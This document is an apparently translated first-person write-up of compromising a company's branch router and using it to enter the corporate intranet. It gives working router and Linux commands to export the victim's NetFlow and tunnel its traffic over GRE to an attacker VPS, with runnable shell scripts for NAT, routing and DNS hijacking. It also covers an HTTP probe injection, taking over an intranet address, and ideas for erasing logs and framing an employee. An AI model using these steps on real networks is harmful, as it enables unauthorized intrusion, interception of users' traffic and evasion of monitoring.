Using a compromised router to enter the intranet
Last year we started using routers to get into target intranets. Before that there was a translated article on wooyun by a foreign author about router traffic hijacking; its preconditions were harsh and the results not very useful, so I decided to write up a test of my own.
0x01 Taking control of a router
There is no elegant way to do this. We picked up a number of routers through distributed scanning and added a few other vulnerabilities on top, which gave a reasonable number of boxes to test on.
The one selected here is a Cisco c800 series small-business router (very old).
Figure 1 router version
Once on the router, the first things to look at are the logs and the login/authentication configuration.
Figure 2 router logon and other related information
There is a login-restriction ACL on the vty lines (already removed earlier), and the telnet password was recovered. AAA is not enabled, so there is no authentication server; authentication is purely local. No logging host is configured and there is no SNMP configuration (I had wanted to leave an SNMP backdoor, but it would not have been of much use here).
Add an account with a password, harden the router, and close the vulnerability that was used to get in.
Figure 3 add a privileged account
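As an added example (not code from the original post), the checks just described can be run mechanically over a saved copy of the running-config: is AAA enabled, which ACL is applied to the vty lines, is a logging host or SNMP configured, how many local users exist, is telnet allowed. The config fed to it below is constructed for illustration; hostname, addresses and ACL name are assumptions.

```sh
#!/bin/sh
# Audit a saved Cisco IOS running-config for the items checked after landing
# on the router. Constructed sample config (not a real device's).
SAMPLE_CFG=$(mktemp)
cat > "$SAMPLE_CFG" <<'EOF'
hostname BRANCH-R1
!
username admin privilege 15 password 7 0822455D0A16
!
interface Ethernet0
 ip address dhcp
 ip nat outside
!
interface Tunnel0
 ip address 172.16.0.2 255.255.255.252
 tunnel source Ethernet0
 tunnel destination 203.0.113.10
!
ip access-list standard MGMT
 permit 10.1.1.0 0.0.0.255
!
line vty 0 4
 access-class MGMT in
 login local
 transport input telnet
!
end
EOF

# cfg_flag FILE REGEX -> "yes" if any config line matches REGEX, else "no"
cfg_flag() {
    if grep -Eq "$2" "$1"; then echo yes; else echo no; fi
}

# cfg_vty_acl FILE -> name of the ACL applied inbound on the vty lines, or "none"
cfg_vty_acl() {
    acl=$(awk '/^line vty/{invty=1;next} /^line /{invty=0}
               invty && /access-class/{print $2; exit}' "$1")
    echo "${acl:-none}"
}

# cfg_summary FILE -> one "check=value" line per item
cfg_summary() {
    echo "aaa=$(cfg_flag "$1" '^aaa new-model')"
    echo "logging_host=$(cfg_flag "$1" '^logging (host )?[0-9]')"
    echo "snmp=$(cfg_flag "$1" '^snmp-server')"
    echo "vty_acl=$(cfg_vty_acl "$1")"
    echo "local_users=$(grep -c '^username ' "$1")"
    echo "telnet=$(cfg_flag "$1" 'transport input.*telnet')"
}

cfg_summary "$SAMPLE_CFG"
```

On the sample this reports no AAA, no logging host, no SNMP, the MGMT ACL on the vty lines, one local user and telnet enabled, which is the same picture the text paints for the real device.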
0x02 Network topology analysis
With the basics done, save a complete copy of the configuration (it cannot be pasted here in full) and work out the basic network architecture from it.
This is a small branch office of a company. Through PPPoE and NAT it has one public IP address and a 10.xx.xx.0/24 intranet, and it connects to the head office through a GRE tunnel, behind which is a much larger intranet.
This kind of network is the most common: the Internet address is obtained by dialing the ISP, and the intranet machines reach the Internet through NAT. Public IP addresses inside a company network are rare.
The network topology is as follows:
Figure 4 network topology
0x03 Preparing to enter the intranet
The intranet machines reach Google through NAT, and that NAT is what shields the intranet. We control R1, the router at the intranet's egress. There is also a public VPS running Ubuntu 12.04. R2 stands for the many routers along the way that we do not control.
An intranet penetration test needs more information, so we added a second public VPS (Win2008R2) as a traffic-monitoring server to analyse the intranet's daily traffic and behaviour.
The Win2008 box hosts a NetFlow collector, and NetFlow is configured on R1 to observe the intranet traffic. There is plenty of NetFlow software around; SolarWinds is the best, supports SQL Server 2005 and can store a lot of data, but I could not find a cracked copy. The ManageEngine product I use has cracks all over the place.
NetFlow configuration on R1 (the rest, including the per-interface ip flow ingress / ip route-cache flow that actually turns flow accounting on, is elided):
  ip flow-export source Ethernet0
  ip flow-export destination 1.1.1.1 8888
  ip flow-export version 5
  ......
Traffic analysis is intuitive. The company's daily work traffic goes to the head-office network through the GRE tunnel; the rest is mainly HTTP and HTTPS. The statistics also show that most DNS goes to Google's public DNS, which accounts for more than 90% of all DNS traffic.
Figure 6 target network traffic Overview
Figure 7 traffic classification
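As an added example (not from the original post), the aggregation a NetFlow collector does behind the figures above, done with awk over flow records exported as CSV: bytes per destination port, and the share of DNS traffic going to Google's public resolvers. The records and the column layout (src,dst,proto,sport,dport,bytes) are constructed for illustration and are an assumption about the collector's export format.

```sh
#!/bin/sh
# Constructed flow records: src,dst,proto,sport,dport,bytes
FLOWS=$(mktemp)
cat > "$FLOWS" <<'EOF'
10.1.1.21,8.8.8.8,17,51234,53,180
10.1.1.22,8.8.4.4,17,40001,53,160
10.1.1.23,8.8.8.8,17,40002,53,200
10.1.1.24,10.1.1.1,17,40003,53,60
10.1.1.21,203.0.113.50,6,51235,443,98000
10.1.1.22,203.0.113.51,6,51236,80,45000
10.1.1.23,203.0.113.52,6,51237,443,120000
10.1.1.25,203.0.113.53,6,51238,22,3000
EOF

# bytes_by_dport FILE -> "dport bytes" lines, largest first
bytes_by_dport() {
    awk -F, '{b[$5]+=$6} END{for (p in b) print p, b[p]}' "$1" | sort -k2,2nr
}

# top_dport FILE -> the destination port carrying the most bytes
top_dport() {
    bytes_by_dport "$1" | head -n1 | cut -d' ' -f1
}

# dns_share FILE -> integer percent of udp/53 bytes sent to 8.8.8.8 or 8.8.4.4
dns_share() {
    awk -F, '$3==17 && $5==53 {t+=$6; if ($2=="8.8.8.8" || $2=="8.8.4.4") g+=$6}
             END{ if (t==0) print 0; else printf "%d\n", (g*100)/t }' "$1"
}

bytes_by_dport "$FLOWS"
echo "top port: $(top_dport "$FLOWS")"
echo "google dns share: $(dns_share "$FLOWS")%"
```

On the sample, 443 carries the most bytes and 90% of DNS bytes go to Google's resolvers; on real exports the same two numbers are what the "traffic classification" and "DNS" panels of the collector summarise.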
Trying to open the web addresses from the traffic statistics gets nowhere: 404 Not Found or certificate errors. So no actual site can be seen that way, and there is no Google search history to look at; at best one can look at related pages on Bing, with few results.
To learn more about the intranet (the company's name, the sites employees visit most, the software they commonly use), the only option left is to hijack DNS first. Because the network environment is awkward (the NAT makes it too complicated), transparent hijacking was ruled out in favour of gateway hijacking.
Some terminology:
Transparent hijacking: my own term for modifying packet payloads and checksums without changing the source or destination IP address. Neither user nor server notices anything; it is completely transparent, and antivirus, firewalls and IPS will not notice either, apart from the added latency.
Gateway hijacking: as the name says, you act as a gateway, routing and NATing the traffic that passes through you so that it still reaches the Internet normally. This has a large footprint: Gmail, for example, will warn about a login from a new location, and so on.
Inline hijacking (my own conclusion): when hijacking traffic in a firewall or NAT environment, wherever you take the packets from, both the hijacked packet and its reply must be put back at that same point.
To explain: hijacking traffic inside the GRE tunnel in a NAT environment is very troublesome. An outbound packet is first routed into the GRE tunnel and only then, as a GRE packet, goes through NAT. NAT therefore acts only on the outer GRE packet and keeps state for it; the packets carried inside the GRE are not NATed, so inner traffic coming back from outside cannot pass the NAT. The same reasoning applies to a firewall.
Given my limited development ability, I settled on the gateway-hijacking mode.
Create a GRE tunnel between the public-facing interface of R1 and eth0 of my Linux box.
Linux IP address: 1.1.1.1
Router public IP address: 2.2.2.2
R1 configuration (tunnel source by interface name; the interface IP address also works, but that caused problems):
  en
  conf t
  int tunnel 1
   tunnel source e0
   tunnel destination 1.1.1.1
   ip address 12.1.1.1 255.255.255.252
  end
Linux (Ubuntu) configuration, creating the GRE tunnel:
  # modprobe ip_gre
  # lsmod | grep gre
  # ip tunnel add gre1 mode gre remote 2.2.2.2 local 1.1.1.1 ttl 255
  # ip link set gre1 up
  # ip addr add 12.1.1.2 peer 12.1.1.1 dev gre1
Ping the peer tunnel address from both ends to confirm the tunnel is up.
Then enable IP forwarding.
Set /proc/sys/net/ipv4/ip_forward to 1 (takes effect immediately, lost on reboot).
Edit /etc/sysctl.conf so that forwarding is enabled at boot:
  net.ipv4.ip_forward = 1   (remove the leading # from this line)
Enable NAT with iptables:
  # iptables -t nat -A POSTROUTING -s 192.168.1.0/25 -j SNAT --to-source 202.103.224.58
Here 192.168.1.0/25 is the source range to be NATed and 202.103.224.58 the public address already on the box; substitute your own. In this setup the source is the intranet range arriving over gre1 (the 10.xx.xx.0/24 subnet) and the public address is the Linux box's own (1.1.1.1 in the example above). The rule takes effect immediately and is lost on reboot.
Save the iptables rules:
  # service iptables save
(That is the RHEL/CentOS init script; on Ubuntu, use iptables-save to write the rules to a file and restore them at boot, or install the iptables-persistent package.)
Add the intranet route:
  # route add -net 10.0.0.0/8 dev gre1
Everything destined for 10.0.0.0/8 leaves via gre1, i.e. all of it goes through the GRE tunnel.
Then we used our own software to capture the DNS traffic; it is not convenient to post it.
After several days of DNS hijacking I had a much clearer picture of the intranet. The next step was modifying HTTP packets to insert a probe; once I knew what they were running, the plan was to add an exploit and get a foothold on the intranet. The probe came back with Chrome, so that was given up. It is not convenient to post the probe output either.
There is also telnet and SSH in the traffic, but it cannot be hijacked: the destination addresses are ACL-restricted, my Linux box cannot reach them, and the connections are simply refused.
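As an added example (not code from the original post), the GRE, forwarding, SNAT and route steps above collected into one script, using the text's addresses (Linux 1.1.1.1, router 2.2.2.2, tunnel 12.1.1.0/30, route 10.0.0.0/8 via gre1). With DRY_RUN=1 (the default) the commands are printed instead of executed, so the script can be checked without root. Assumptions: eth0 is the public interface; the SNAT source is the intranet range carried in the tunnel; the udp/53 DNAT is one way to pull intranet DNS queries into a resolver on this box for gateway-mode hijacking (the author used their own software for that step, not this rule); and hijacked_host_route is the Linux side of the hijacked-address trick in 0x04, with R1 needing the matching host route pointing at Tunnel1.

```sh
#!/bin/sh
DRY_RUN=${DRY_RUN:-1}
PUB_IF=eth0                 # public-facing interface (assumption)
LOCAL_PUB=1.1.1.1           # this box's public address
ROUTER_PUB=2.2.2.2          # R1's public address
TUN_LOCAL=12.1.1.2
TUN_PEER=12.1.1.1
INTRANET=10.0.0.0/8         # routed into the tunnel
NAT_SRC=10.0.0.0/8          # must cover the intranet addresses arriving over gre1
RESOLVER_PORT=5353          # assumed resolver listening on the tunnel address

# run CMD... : print the command in dry-run mode, execute it otherwise
run() {
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

gre_up() {
    run modprobe ip_gre
    run ip tunnel add gre1 mode gre remote "$ROUTER_PUB" local "$LOCAL_PUB" ttl 255
    run ip link set gre1 up
    run ip addr add "$TUN_LOCAL" peer "$TUN_PEER" dev gre1
}

# same as writing 1 to /proc/sys/net/ipv4/ip_forward; persist via sysctl.conf
forwarding_on() {
    run sysctl -w net.ipv4.ip_forward=1
}

# intranet sources leave the public interface rewritten to our own address
nat_rules() {
    run iptables -t nat -A POSTROUTING -s "$NAT_SRC" -o "$PUB_IF" -j SNAT --to-source "$LOCAL_PUB"
}

# everything for 10/8 goes back into the tunnel towards R1
intranet_route() {
    run ip route add "$INTRANET" dev gre1
}

# gateway-mode DNS hijack: queries arriving over gre1 are handed to our
# resolver on the tunnel address (DNAT to 127.0.0.1 would need route_localnet)
dns_redirect() {
    run iptables -t nat -A PREROUTING -i gre1 -p udp --dport 53 -j DNAT \
        --to-destination "$TUN_LOCAL:$RESOLVER_PORT"
}

# hijacked_host_route IP IFACE: /32 for the intranet address we took over,
# pointing at the OpenVPN interface the workstation connects through; it is
# more specific than the 10/8 route, so replies reach the workstation
hijacked_host_route() {
    run ip route add "$1/32" dev "$2"
}

all_steps() {
    gre_up; forwarding_on; nat_rules; intranet_route; dns_redirect
}

# step_count -> number of commands all_steps issues
step_count() { all_steps | grep -c . ; }

all_steps
```

Run with DRY_RUN=0 as root on the Ubuntu box to apply; order matters only in that the tunnel must exist before routes reference it, which is why gre_up comes first.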
0x04 Entering the intranet
The traffic did not get me intranet access, so I had to walk into the intranet myself.
Take over a valid intranet IP address that nobody is using and assign it to yourself by connecting to the Linux box over OpenVPN. The rest is just a host route for that IP on the router and, on Linux, a route for 10.xx.xx.xx/8 into the tunnel; with that my workstation has intranet access (no VPN or other restrictions; the access is equivalent to the router's own).
Getting your workstation onto the intranet is then easy, with countless ways to do it, since this Ubuntu box is already on the intranet. The OpenVPN configuration and the extra routes are not pasted here; there are plenty of write-ups online.
Figure 8 verify the Intranet connectivity of Ubuntu
Entering the intranet this way has the following advantages:
All your traffic is seen as intranet traffic by whatever monitors the intranet. Even if the volume is a bit large, you can pull files without worrying about alerts on excessive traffic. (In theory; no documents were actually taken.)
Hiding on the router avoids NetFlow monitoring and lets you remove logs; when leaving, you can simply erase all storage, and your activity cannot be found on the intranet. (In theory; never done.)
If the hijacked address is chosen well, you can bypass login restrictions on intranet servers (layer-3 restrictions).
With good timing you can create the illusion that an intranet employee downloaded a large number of files from the file server. (In theory; never done.)
Disadvantages:
The packets are not encrypted, which is annoying: they are essentially completely in the clear. If there is no security device outside the router, or you build an IPsec tunnel instead, this is not really a disadvantage.
In summary, it is highly covert, far more so than a VPN or a trojan; even the log server can be ignored.
The title says entering the intranet, not intranet penetration.
All sensitive information has been altered.
0x05 Other small discussions
Link latency has been discussed a lot. Take the Google traffic I hijacked as an example: on the intranet's path to Google, I sit close to the Google end.
The average latency from my Linux box to Google is 0.617 ms.
Figure 9 Ubuntu to Google latency
The average latency from the router to the Linux box is 256 ms, while the router's own ping to Google is 180 ms.
Figure 10 Router network latency
The software delay on Linux for modifying packets is about 5 ms, so the estimated latency after hijacking is about 262 ms (256 + 0.6 + 5).
But the measured latency to the target after hijacking is 248 ms, less than 256 ms + 0.6 ms + 5 ms. Why?
Overall, latency went up by about a third, roughly 60 ms.
Latency was debated a lot beforehand: a one-third increase has an obvious effect, so it should be easy to detect and alert on. My own view is that even 500 ms or 1 s extra would go unnoticed: even Baidu's ops people, after checking the IP and looking at a tracert, would just curse the ISP. Ordinary users certainly do not think the carrier is the problem; they just think their own computer is slow. Who would suspect they have been hijacked?
On intranet routers: the router in this article is a network border router with at least one public IP address. When the router or layer-3 switch sits inside the intranet, can hijacking still be used? Yes: build an application-layer tunnel out through the intranet (GRE is a layer-3 tunnel) the way an ordinary PC would, or connect directly to a server on the intranet to hijack the data (verified, but the peer in the public-network test was a public Cisco 2911 router; I have not tried it against a server, development ability being limited).
To penetrate further you need a higher-layer VPN, such as IPsec VPN or EZVPN (I tested those two; other VPNs above layer 3 should work in theory). The configuration is far more complex than a GRE tunnel, although the principle is easy to understand; I could not get the configuration to work. In theory an IPsec VPN should be able to establish a connection to an IPsec VPN server; I did not succeed and am still studying it at the theoretical level. EZVPN is Cisco-proprietary, so a server for it certainly cannot be built on Windows or Linux.
On persistence: persisting on the intranet through the router, or with a backdoor on the router itself, is far better. Apart from the NSA and FireEye, I have never heard of anyone who has worked on router backdoors. In China only a handful of people can even configure a router, let alone reverse one.
On HTTPS: the green lock is indeed a headache. What I have tried so far is nesting, inserting red-label (untrusted) content inside a green-label page, with the green label still showing in the end.
On hijacking software: the Internet says there is lots of it, but in fact none can be used directly, especially for transparent-mode hijacking; I found nothing usable out of the box. Everyone recommends things like mitmproxy, but in practice they are suited to developers debugging software, so you end up writing your own, with limited development ability.
I would welcome recommendations for software that can handle large traffic volumes efficiently (BGP-hijacking scale).